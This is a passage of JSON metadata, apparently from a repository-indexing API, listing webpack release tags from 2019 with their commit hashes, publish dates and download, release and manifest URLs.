webpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyst